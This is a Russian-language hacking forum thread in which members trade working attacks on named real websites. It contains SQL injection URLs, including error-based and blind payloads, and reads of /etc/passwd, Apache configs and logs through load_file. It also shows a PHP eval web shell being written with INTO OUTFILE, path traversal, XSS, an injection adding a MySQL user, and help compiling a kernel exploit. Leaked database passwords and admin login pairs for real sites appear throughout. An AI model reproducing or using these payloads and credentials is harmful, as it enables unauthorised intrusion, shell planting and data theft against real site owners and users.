unu']Ну как бэ от ордер бай не всегда польза есть, часто приходится в ручную все гонять:(
ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
+and+substring(version(),1,1)=4

n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
[+] Current Database : nsider
[+] Database User : nsider_mysql@apache2-fungi.pistons.dreamhost.com
[+] MySQL Version : 5.0.67-userstats-log

2fng,


http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens

вывод в свойставх картинки

спасибо парни, вроде так же делал, не заметил может вывод...

1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:


<?php
$a = "javascript://%0adocument.write('<script>alert(0)</script>');";
$data = htmlspecialchars($a);
echo "<a href=$data>Tikni</a>";
?>


просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте
Я в шоке!!! А что делать??

Я в шоке!!! А что делать??

Как бы ужасно это не звучало, но htmlentities приведет к тому же результату :)

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся

Как бы ужасно это не звучало, но htmlentities приведет к тому же результату :)

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся
strip_tags поможет в случае с выводом в ссылку или с утф-7??

strip_tags поможет в случае с выводом в ссылку или с утф-7??

UTF-7 сработает только если в браузере стоит автоопределение кодировки, да и то, если браузер поддерживает UTF-7 кодировку вообще. Не очень актуально для современных браузеров

Он хочет например через str_replace() заменять в передаваемых гетом/постом запросах латинские буквы на русские, чтобы если ты передаешь гетом или постом что то типа "...script" оно менялось на русские буквы и не пахало.
Это не самый лутший вариант.

Но хочу повторить: здесь раздел для обсуждения УЯЗВИМОСТЕЙ, по поводу защиты пиши в кодинг.

Посмотрите еще вот это плиз


www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700

почему так происходит?

Посмотрите еще вот это плиз


www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700

почему так происходит?


http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)

unu']http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)
гуд,вот только /**/and/**/1=1/* - тут незачем
ПС слепая там

гуд,вот только /**/and/**/1=1/* - тут незачем

Да /**/and/**/1=1/* разве что для обхода фильтрации, но мне так удобнее выходит ;)

Помогите найти админку, сканером не получается.


http://www.lechaim.co.za

люди, вот за сегодня сайтов 5 раскрутил до вида логин;пасс и нашел админки. Но ни одна пара логина и пароля не подошла и с такой проблемой я сталкиваюсь ооочень часто.
П.С. Пары,уверен, с админскими правами

А ты пассы расшифровывал?)

П.С. А откуда такая уверенность?
ну как бэ я думаю, что у обычного юзера логин admin не будет)

Чото не получается с XSS видно защита какаято или хз((( Есть еще варианты получить пасс админа??(кроме брута)

php injection (шелл) sql injection (пассы юзеров, может быть что и админа) брут сайтов + приват прокси + хороший пасс лист ( и мон кучу юзеров сбрутить)

Из всего этого я знаю только брут)))

php injection - http://forum.antichat.ru/thread12123.html
sql injection - http://forum.antichat.ru/thread43966.html
неужели трудно было самому найти

[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....
http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(

[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....

почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(
Вот ответ на твой вопрос:
http://forum.antichat.ru/threadnav119047-2-10.html

[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....

почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(

NAME_CONST - http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_name-const

как скомпилить сплойт, написанный на Си компилятором g++ ?


$ g++ -fno-stack-protector -o exp exploit.c
exploit.c: In function 'void extract_and_play_video()':
exploit.c:78: error: expected unqualified-id before 'template'
exploit.c:85: error: invalid conversion from 'void*' to 'char*'
exploit.c:94: error: expected primary-expression before 'template'
exploit.c:100: error: expected primary-expression before 'template'
exploit.c:102: error: expected primary-expression before 'template'
exploit.c: In function 'int own_the_kernel(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)':
exploit.c:321: error: invalid conversion from 'unsigned int*' to 'int*'
exploit.c: In function 'int pa__init(void*)':
exploit.c:354: error: invalid conversion from 'void*' to 'char*'
exploit.c:358: error: invalid conversion from 'void*' to 'char*'
exploit.c:395: error: expected unqualified-id before 'template'
exploit.c:399: error: expected primary-expression before 'template'
exploit.c:404: error: expected primary-expression before 'template'

2totem

$ gcc -fno-stack-protector -o exp exploit.c

нашел вроде как инъекцию в поиске, но результат вылетел какойто запутанный:

Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `db_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/..../req/db/drivers/mysql/MySqlConnection.class.php on line 176
как в данном случае можно подставить запрос?

M1Ks продолжаем тему... ребята вообще тут идет такая лажа как на video.antichat.ru
когда в поле поиск вбивали кавычку и оно выдавало ошибку (все идет из-за бажного поисковика) может есть какие то способы крутить такие скули
http://rcc-penza.ru/advanced_search/
импульс на ковычку
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176
импульс на XSS ( "><script>alert('XSS');</script> )
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE `name` LIKE '%"><script>alert('XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AN' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.p in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176

2 [x60]unu
раскручиваем как blind по методу Qwazar'a [подробнее (https://forum.antichat.ru/showpost.php?p=1494443&postcount=11) ]
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*
и видим 1ю таблу : CHARACTER_SETS

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

Попробуй вместо пробела $IFS

Привет
вот вроде как уязвимость

http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd') from+mysql.user--+
проверка на заливку
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'<?php eval($_GET[‘e’]) ?>' from+mysql.user INTO OUTFILE '/tmp/aaaaaaaaa11231.php'--+ -все записывается в папку /tmp/ , так же если захожу в /etc/passwd отображается список админов + вроде абсолютные пути к сайтам ..,но !или нет прав записи или же абсолютный путь не правильный - это если заливать по пути который указан для админа по /home/virtual/site3/fst/home/spacefoundation в /etc/passwd:(
И еще когда читаю файл из tmp то запись там вида -
1,2,3,4,5,6,7,8,9,10+<?php eval($_GET[‘e’]) ?> находится в сорсе ,...+ проверял на ошибки чтоб выдавал путь - без толку. в кеше гугла ошибок нет..
проверял на наличие стандартных папок по этим шаблонам - http://forum.antichat.ru/threadnav30632-1-10.html -тоже ничего не обнаружил ...очень конечно привлекло внимание расписанный /etc/passwd .. Есть мысли ?

2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html

Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

?lang=../../../../Documents+and+Settings/

нашел ... а в какой строчке искать сие чудо ? ну или хотя бы куда смотреть ... или выложить целиком этот файл сюда ?ага извеняюсь , не заметил что поправил сообщение ..

apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними

apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними

DocumentRoot, без нижней черты.

# DocumentRoot "/var/www/html"

# DocumentRoot /www/docs/dummy-host.example.com

Это из httpd.conf

[QUOTE=Ins3t]2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php

в DocumentRoot обычно путь до дефолных файлов апача, где index.html c текстом It's work
Как правило реальные пути до сайтов, особенно если это хостинг, находятся в вирутальных хостах

что т я запутался ребята :(куда смотреть что писать :)

кстати это не хостинг .. там просто все как то хитро ..это какая то организация космическая на ихнем сервере около 10 сайтов космической и научной тематики просто что это за пути в /etc/passwd
----------------
вот еще в самом низу -
# Include httpd20_app.conf
Include conf/httpd20_app.conf

apekoff, смотри ниже в httpd.conf инклудится файл
Include conf/httpd20_app.conf
http://www.spacefoundation.org/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/httpd20_app.conf%27%29%20from+mysql.user--+
тут инклудится
/etc/httpd/conf/virtual
Судя по всему это папка в которой находятся конфиги всех сайтов

http://www.spacefoundation.org/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/virtual/site1%27%29%20from+mysql.user--+

Вот конфиг для первого сайта, перебирай имена site1,site2 ...

Кстати это хостинг, вернее какая то контора которая предоставляет выделенные сервера, у меня есть шелл на сервере с абсолютно схожими расположениями конфигов, поэто му я сейчас посмотрел какие файлы в /etc/httpd/conf/virtual =)

чет не могу я залить :(

чет не могу я залить :(
И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены

И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены
а что я разве просил ?я спрашивал ...

[QUOTE=Ins3t]2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php

изучай:


http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/access_log')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/error_log')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/my.cnf')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/logrotate.d/proftpd')--+

http://www.spacefoundation.org/news/story.php
?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'text' from+mysql.user INTO OUTFILE '/home/virtual/site3/fst/var/www/html/111.php'--+
вот как получается правильный путь - но записи нету :(,почему?

it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
/add например http://www.spacefoundation.org/research/TSR07.php?id=-420'+union+select+load_file('/home/virtual/site14/fst/var/www/html/mail/index.php')--+1

define('SENDSTUDIO_DATABASE_TYPE', 'mysql');
define('SENDSTUDIO_DATABASE_USER', 'webdev');
define('SENDSTUDIO_DATABASE_PASS', 'a50x35sf');
define('SENDSTUDIO_DATABASE_HOST', 'localhost');

вот как получается правильный путь - но записи нету :(,почему?
может прав нету, не?
ищи папку, где будут права на запись, либо попробуй другим способом

it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
получается путь пральный !
видимо нет прав на запись ...или я не даже не знаю .. идеи ?
Да

Закончить флудить и как уже сказали искать папку на запись
Да вы батенька - хам
Лайт можно тебя в ПМ, а то джокстер говорит что я флудер , а сам тупо 2 мессаги захирячил ниочем

видимо нет прав на запись

Да
идеи ?
Закончить флудить и как уже сказали искать папку на запись

apekoff, на тебе диру под запись:
/home/virtual/site3/fst/var/www/html/docs/
гугл всемогущий...или брюс. Похрен впрочем. Лейся.

парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpa ssword),5,6,7,8,9,10,11,12+from+users--
http://www.kamal.dk/admin

но опять ничего не подошло, посмотрите плиз)

но опять ничего не подошло, посмотрите плиз)
Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))

Возможно таблица юзеров от чего то другого

wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)

На этом сайте есть таблица user

http://www.pcci.org.za/default.asp?id=946

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id = 946''.

/default.asp, line 128


http://www.pcci.org.za/default.asp?id=946+order+by+2
http://www.pcci.org.za/default.asp?id=946+union+select+1,2

http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'






Microsoft JET Database Engine error '80004005'

The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

/default.asp, line 128




Но вывести нечего не удаеться.

Поскажите, как правилбно составить запрос.

FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATO RS

ElteRUS, смотри, www.pcci.org.za/admin - админка
есть три пары:
admin;admin
admi;admin
manager;manager
правильно?
Но опять же, в админку не попасть)

FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATO RS





Thanks, все получилось.

http://login.main.cne.gov.pr/login.php
есть следующие пары:
admin:Dyn@mic
webmaster:2624

Но опять же ни один не подошел! Мне кажется, что я что то не так делаю,т.к. не может не подходить пароли уже к больше чем к 10 сайтам!

Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.

Ну если есть инъекция в INSERT/DELETE запросе - то можно.

а если в SELECT-е -- нет?

Ну если есть инъекция в INSERT/DELETE запросе - то можно.
Пример внедрения в студию

Скуль в имени таблицы:

INSERT INTO [SQL] VALUES('site','lala','blabla','lolo','aaa');

INSERT INTO [mysql.user (user, host, password) VALUES ('new_user', PASSWORD('password')),a,b,c)/*] VALUES ('site', 'lala', 'blabla', 'lolo', 'aaa');

Скуль в имени таблицы
А если mysql-inj будет в параметрах? (так то если mysql-inj в имени таблицы то это легко крутить)(именно интересует выход за таблицу и запись в другую какую либо таблицу (но скорее всего это не возможно :) ))

Ну если есть инъекция в INSERT/DELETE запросе - то можно.
ты забыл добавить одно НО, если у пользователя из под которого работает скрипт ЕСТЬ ПРАВА НА ВЫПОЛНЕНИЕ операторов INSERT/UPDATE/DELETE.

Хотя да, я невнимательно прочитал твоё сообщение. Извиняюсь.

например:
INSERT INTO users
SET id ={inj}

INSERT INTO users
SET id =1 ON duplicate KEY UPDATE pass = '12345'

поле id должно быть первичным ключем или просто уникальным

как скомпилить сплойт, написанный на Си компилятором g++ ? К компилятору gcc доступа нет.


$ ls -la /usr/bin/gcc
-rwx------ 2 root root 202320 May 27 2008 /usr/bin/gcc
$ ls -la /usr/bin/g++
-rwxr-xr-x 2 root root 202320 May 27 2008 /usr/bin/g++




$ g++ -fno-stack-protector -o exp exploit.c
exploit.c: In function 'void extract_and_play_video()':
exploit.c:78: error: expected unqualified-id before 'template'
exploit.c:85: error: invalid conversion from 'void*' to 'char*'
exploit.c:94: error: expected primary-expression before 'template'
exploit.c:100: error: expected primary-expression before 'template'
exploit.c:102: error: expected primary-expression before 'template'
exploit.c: In function 'int own_the_kernel(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)':
exploit.c:321: error: invalid conversion from 'unsigned int*' to 'int*'
exploit.c: In function 'int pa__init(void*)':
exploit.c:354: error: invalid conversion from 'void*' to 'char*'
exploit.c:358: error: invalid conversion from 'void*' to 'char*'
exploit.c:395: error: expected unqualified-id before 'template'
exploit.c:399: error: expected primary-expression before 'template'
exploit.c:404: error: expected primary-expression before 'template'

Как уже поведал мне товарисч razb, эрроры у тебя из за того, что template в языке С - это ключевое слово, а у тебя это переменная. Переименой ее.

Там покруче есть)
http://www.whitehall.ru/producer.php?ID=phpinfo()

Не получается потому что там 3я версия мускула,поэтому объеденить два select'а не выйдет. Хоть ты и не просил,вот в конфиге прочитал:
$admpasswd='Ultra';
$admlogin='admin';

https://forum.antichat.ru/showpost.php?p=565034&postcount=4
[-_-]

Люди сорри,наверняка возникала такая проблема,но все страницы долго читать)последнее время когда натыкаюсь на новые сайты со скулем хочу проверить их на иньекцию.при любом запросе вылетает белый лист с надписью hacking attempt!перевод то я понимаю,но вот никак понять не могу,можно ли я эту надпись как то обойти и дальше поковырять базу,или сразу понятно что даже если уязвимость есть,ею не воспользоваться?

Люди сорри,наверняка возникала такая проблема,но все страницы долго читать)последнее время когда натыкаюсь на новые сайты со скулем хочу проверить их на иньекцию.при любом запросе вылетает белый лист с надписью hacking attempt!перевод то я понимаю,но вот никак понять не могу,можно ли я эту надпись как то обойти и дальше поковырять базу,или сразу понятно что даже если уязвимость есть,ею не воспользоваться?
На разных сайтах это организовываеться по разному,своровали с DLE :(
Но в основном,просто либо

if(!intval(var)){
echo 'Hacking attempt!';
}

or

if(preg_match('#\'|union|select|...#isU',var)){
echo 'Hacking attempt!';
}

Ну или подобные варианты,на парсинг QUERY_STRING целиком.
Так что тут под каждй случай в отдельности нужно искать обход.
Или копать в другую сторону.

сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=

сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=

нужный тебе файл хранится в
$CATALINA_HOME/conf/tomcat-users.xml,
где $CATALINA_HOME, папка, указанная при установке сервера приложений

сталкнулся сейчас с такой вещью как Tomcat Server Administration, кто подскажет где мне на никсовой тачке искать tomcat-users.xml с паролями? и если я туда получю доступ есть ли шансы залить шелл? поделитесь опытом (=
find / -name tomcat-users.xml

А к в каких случаях/версиях Апач выполняет предыдущий тип файла, если не знает основной? Например, shell.php.qwe . У меня на win, в денвере работает, а на хостингах что-то нет ;/

А к в каких случаях/версиях Апач выполняет предыдущий тип файла, если не знает основной? Например, shell.php.qwe . У меня на win, в денвере работает, а на хостингах что-то нет ;/
должен быть подключен mod_mime

Хмм...а есть где нить отдельная тема про эту фичу?насколько я понял сейчас у меня с сайтом ситуация номер 2.может намекнёшь как ее обойти?

Можно ли найти sql или xss на юкоз сайтах

Знаю ток насчет xss,раньше вроде можно было делать через смайлы.(т.е.ты на свое сайте делаешь скрипт,скрываешь его под картинкой и вставляешь этот смайл в чате на юкозе)поищи что то подобное.а по поводу скуля вроде как нет.

чем может быть объяснено следующее: у директории на сервере права drwxrwxrwx но записать в нее ничего не удается ни с помощью PHP ни с помощью INTO DUMPFILE в mysql. Места на диске хватает с избытком. Если смотреть stderr неудачного создания файла(например с помощью wget) то там лаконичное "permission denied"..

safe_mode , open_basedir ?

Знаю ток насчет xss,раньше вроде можно было делать через смайлы.(т.е.ты на свое сайте делаешь скрипт,скрываешь его под картинкой и вставляешь этот смайл в чате на юкозе)поищи что то подобное.а по поводу скуля вроде как нет.
это не xss была

Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля?

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_ schema.schemata/*

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_ schema.columns+where+table_schema=0x64625F70726F6D 74726163746F72/*

Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо

Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо
Посмотреть исходные коды.Ведь вайл вообще может сохраняться в папке,невидимой из веба.Ну или можно просканировать сайт на наличие директорий по виду:
up
upd
uploadfile
upload
...

А как гялнуть исходник ? сервер сразу выполняет,и я вижу страницу ошибки.. сканил по словарю бестолку...+ скан по линкам
iss 6.0/win32.

safe_mode , open_basedir ?
нет safe_mode и запрещенных функций, команды выполняются нормально. open_basedir тоже нет. То есть system('ls -la'); с успехом выполнится но system('echo 1>1.txt'); уже никак

Вопрос такой: как находить прямой пусть до папки атачей? заливаю файл ,а куда понять не могу,скачать могу чере site.com/file.php?id=1
спасибо

Никак не понять, юзать мозг, выкладывать полную информацию о ДВИЖКЕ, потом думать и слушать советы зеленых. Скан тут не при чем.

чем может быть объяснено следующее: у директории на сервере права drwxrwxrwx но записать в нее ничего не удается ни с помощью PHP ни с помощью INTO DUMPFILE в mysql. Места на диске хватает с избытком. Если смотреть stderr неудачного создания файла(например с помощью wget) то там лаконичное "permission denied"..

нет прав, вот и всё понимание. Вывод:

1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)

PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного

Ребята, помогите разобраться. Нет сил уже, все перепробовал - не могу найти ничего полезного... Может быть так, что в базе нет логина и пароля?

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,schema_name,3,4+from+information_ schema.schemata/*

http://www.promtractor.ru/links.php?cat_id=-1+union+select+1,column_name,3,4+from+information_ schema.columns+where+table_schema=0x64625F70726F6D 74726163746F72/*

Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.

Я обычно использую такой запрос для поиска актуальных таблиц

1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*

Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.

ElteRUS, смотри, www.pcci.org.za/admin - админка
Но опять же, в админку не попасть)

Ты хочешь чтобы я понегодовал вместе с тобой ? Ок. Злопакостные гоблины-администраторы не пускают нас в админку, мерзавцы !111

Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.

Факт, что ты нашел таблицу admins и извлек из нее логин\пароль не гарантирует тебе допуск в админку. Реальные данные авторизации админа могут находится в другой БД, в другой таблице (напр. users) , храниться в файле (напр. конфиге) или вообще могут быть прописаны в скрипте авторизации как константы (видел такое). Как повезет.

И это как минимум. Хотят ломать, да еще чтобы легко было, да еше возмущаются, когда нелегко. Просто млею с таких постов.

ElteRUS + 500

Так что там насчет моего вопроса?есть у кого идеи?

нет прав, вот и всё понимание. Вывод:

1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)

PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного

Расскажи плз как можно расставить такие права

Папка drwxrwxrwx
safe_mode , open_basedir no

А то мы тут что-то не вкуриваем :(

нет прав, вот и всё понимание. Вывод:

1. Попробовать изменить права (если получиться)
2. Лить из админки форума (цмс и т.д.)

PS: Сталкивался с таким и не раз. Грамотно раставленные права для phpmyadmin-юзеров. Ничего необычного
как это нет прав? ls -la для текущей папки и всех файло выдает rwxrwxrwx то есть права на запись есть у всех.
Но при этом даже простой акт открытия файла на запись через PHP - fopen("newfile","w"); завершается с ошибкой. Естественно что ни через CMS ни через форум залить ничего не удается - у них не больше возможностей чем у меня. phpmyadmin'ом там и не пахнет но есть права root для sql-инъекции. Как я уже говорил, с помощью нее тоже залить не удается.

bons, а что показывает df и cat /etc/fstab?

Расскажи плз как можно расставить такие права

Папка drwxrwxrwx
safe_mode , open_basedir no

А то мы тут что-то не вкуриваем :(
